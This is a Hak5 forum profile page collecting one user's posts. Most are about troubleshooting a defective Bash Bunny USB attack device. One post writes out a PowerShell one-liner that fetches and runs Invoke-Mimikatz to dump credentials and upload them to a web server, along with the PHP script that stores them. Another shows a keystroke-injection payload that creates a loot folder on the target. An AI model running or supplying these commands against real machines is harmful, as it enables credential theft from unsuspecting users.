Jump to content
Hak5 Forums


Active Members
  • Content count

  • Joined

  • Last visited

1 Follower

About TeCHemically

  • Rank
    Hak5 Fan ++

Profile Information

  • Gender

Recent Profile Visitors

1,483 profile views
  1. TeCHemically

    Firmware update fails

    Thanks, yes it definitely is in arming mode; and this bunny came on the 1.3 firmware. I checked it before I ran the updater. The unbricking reset process doesn't work either. It never does anything other than boot into arming mode even after the plug in and unplug 3 times over at the beginning of that process.
  2. TeCHemically

    Firmware update fails

    Thanks Just_a_User, I tried that and it is still skipping right over the firmware update as before :( I got excited by your response and was super hopeful that would do it. Thanks anyway :)
  3. TeCHemically

    Firmware update fails

    ok, I am not sure why that formatting issue occurred and why it would not let me just past the text in w/o making it such a mess. Sorry everyone, thanks to any who read it and reply!
  4. TeCHemically

    Firmware update fails

    I received my replacement bashbunny yesterday and this new one will not perform the firmware update. Here is what I have tried so far: I have the sha checksum verified 1.4 firmware update file on the root of the storage partition and have plugged it into 2 different PCs (one linux and one windows); but it just mounts the storage and boots into arming mode normally. It totally skips the firmware update. I tried the f/w update on a third PC (windows) and it failed to start as well. I even tried the unbricking reset steps provided by Seb. The unbricking reset will not even start. I get no "police" flashing at all. Whenever the bunny is plugged in all it does is mount the storage partition. No reset or firmware update procedures ever begin. I tried to flash the 1.3 firmware as well to make sure it wasn't an issue with the firmware file itself. It just boots normally into arming mode completely bypassing the expected firmware update as it does with the 1.4 version. I also tried running the bunnyupdater version 1.0 and the newer 1.1; no change :(
  5. TeCHemically

    15 Second Mr. Robot Hack question

    Great advice, thanks for your response! I took your advice and here is what I got: 2017-11-20_19-46-03.creds is not writable.#file_put_contents($file, file_get_contents("php://input")); So, it looks like the file does not have write permissions. I thought I had the permissions set appropriately; but clearly I wasn't right. The file has write permissions for www-data (file is owned by www-data). What setting do I need to set so that this file has permissions to write to the server? Sorry for the nooby question. Thanks again for your help in identifying the issue!
  6. TeCHemically

    15 Second Mr. Robot Hack question

    I have a question about this; I have always used tcpdump for this attack because the PHP file never gathers the incoming credentials. Can someone tell me what I am doing wrong? I am using the same command like above: powershell "IEX (New-Object Net.WebClient).DownloadString('MyWebServer/My.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('MyWebServer/My.php', $output)" Here is the PHP script: <?php $file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds"; file_put_contents($file, file_get_contents("php://input")); ?> it was broken up like this before; but didn't see,m to have any affect (i know almost nothing of PHP; so this probably makes no difference): <?php $file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds"; file_put_contents($file, file_get_contents("php://input")); ?> Thanks to any who reply!
  7. TeCHemically

    15 Second Mr. Robot Hack question

    Windows 10 has patched lsass now which effectively breaks mimikatz functionality.
  8. Well, I have some ok news and some great news guys. Firstly, thanks to all who assisted me in troubleshooting my issues with my bashbunny. The "ok news" is that I am not crazy, or just plain dumb in the head, and the bashbunny that I have is indeed defective. The "great news" is that Hak5, the kind folks that they are, have been able to verify my suspicions and are getting me a replacement device. Seriously, thanks again to all who helped me troubleshoot this device. I am sincerely grateful for all of your time and suggestions. I am looking forward to my bunny's arrival so I can get to work on the new payloads I have cooking up. I think I have a pretty nice recipe brewing here! :)
  9. Thanks for your reply. Yes, I am safely ejecting; and my AV is set to not interact with the drive letters that my externals mount to.
  10. Just tried to run my first payload after the reformat and it failed on the first operation where the payload creates a directory because it says the file system is corrupted. I even got it to unmount successfully after I put the payload on there before I ran it. If I open a powershell window and try to create the directory I get the same error. This is what fails: Q DELAY 6000 Q GUI r Q DELAY 1000 Q STRING POWERSHELL Q ENTER Q DELAY 1500 Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\) Q ENTER Q DELAY 1500 Q STRING \$LOOTDIR2 \= \"\$\(\$Bunny\)\\loot\\JackRabbit\\\$\(\$env:computername\)-\$\(\$env:username\)\" Q ENTER Q DELAY 1500 Q STRING md \$LOOTDIR2\\ Q ENTER Q DELAY 1000 This is the command that fails: Q STRING md \$LOOTDIR2\\
  11. I updated all related USB drivers and installed all MS USB, RNDIS, and any other "recommended" fixes that sounded like they could even be remotely related just to be sure it wasn't my machine causing this. I only use MBAM for AV and it has rules not to mess with certain drive letters where my tools mount. I ran udisk reformat again today. Then was able to unmount properly. Plugged it back in, and no power. It didn't come on at all. I unplugged then plugged it back in and it booted up. I ran the bunny updater, it found a new firmware version which I thought was odd because I didn't think udisk reformat was supposed to revert it back to an older firmware. I have been on version 1.4. This has happened before as well. I have also gone through the unbricking process after being on 1.4 and afterwards it was NOT on an older firmware; something I thought WAS supposed to happen as a result of that process (correct me if I am mistaken guys). So, after the bunny updater pulls down the firmware it tells me to eject. I try and again it fails just as before: "'BashBunny (O:)' is currently in use. Save any open files on this disc, and then close the files or programs using the files before trying again. If you choose to continue, the files will be closed, which might cause data to be lost." So, whatever corruption issue I keep seeing over the past few weeks is not being resolved by udisk reformat. This thing has me wanting to tear out my hair.
  12. I ran that; and after the reboot as soon as it booted and i tried to unmount the device, I got an error that said files were in use. I'm investigating potential issues with my PC. It's the only other common item in these situations. Making sure all related hotfixes for USB drivers, updated drivers, etc. are installed. Hopefully this resolves the issue and I'll be able to reformat and get this bunny going again. I'll report back. Thanks for the feedback guys! :)
  13. TeCHemically

    Much credentials payloads are not working

    Thanks for your reply. I'm not using mimikatz in this payload though and have no AV on my test VM.
  14. Thanks for all of your feedback. The payloads I am using have ejecting routines built in for this very purpose; but since the storage corruption issues prevent the payloads from executing properly it nullifies the effect the routine is intended to have. I am quite frustrated; and I am sure that is coming across in my conveyance. I don't mean to be passive aggressive at all. That is contrary to my nature. I am just trying to figure out what needs to be done to resolve these seemingly unsolvable issues. My email communications with Hak5 support have not resolved these issues. The bunny has been reformated, reflashed, etc. several times over the course of the past few weeks and its performance seems to only be getting worse. If it was as simple as that I would be ecstatic right now; but unfortunately, that has not been the case. Every payload, to some degree, is failing with this unit. This is why I believe its an issue with the device itself. I understand the payloads are community driven and not the responsibility of Hak5; but when nothing works consistently, then the only other place to look is the device itself.
  15. Thanks for your reply. I have gone through several rounds of troubleshooting with this device with Hak5 support. I'm kinda feeling out the community wondering if my issues are being felt elsewhere. I can see many more problem threads in the BB forums than I remember seeing in any of the other Hak5 device forums I have participated in. I am REALLY hoping this is just an issue with my device and that I'll be able to get a replacement and get this working. I am a huge fan of what this device is supposed to be able to do and I would love to start sharing my payloads and begin singing its praises as I had hoped I would be by now. The ducky is a great stable tool for me and I have 3 different pineapples (along with other random hakshop accessories); the bunny is the only device that has been this problematic. I have been a Hak5 since they were on the east coast. So, I'm no stranger to the scene. Please, any who are having no issues with their bunny, do weigh in! I'd love to hear that I am an isolated incident.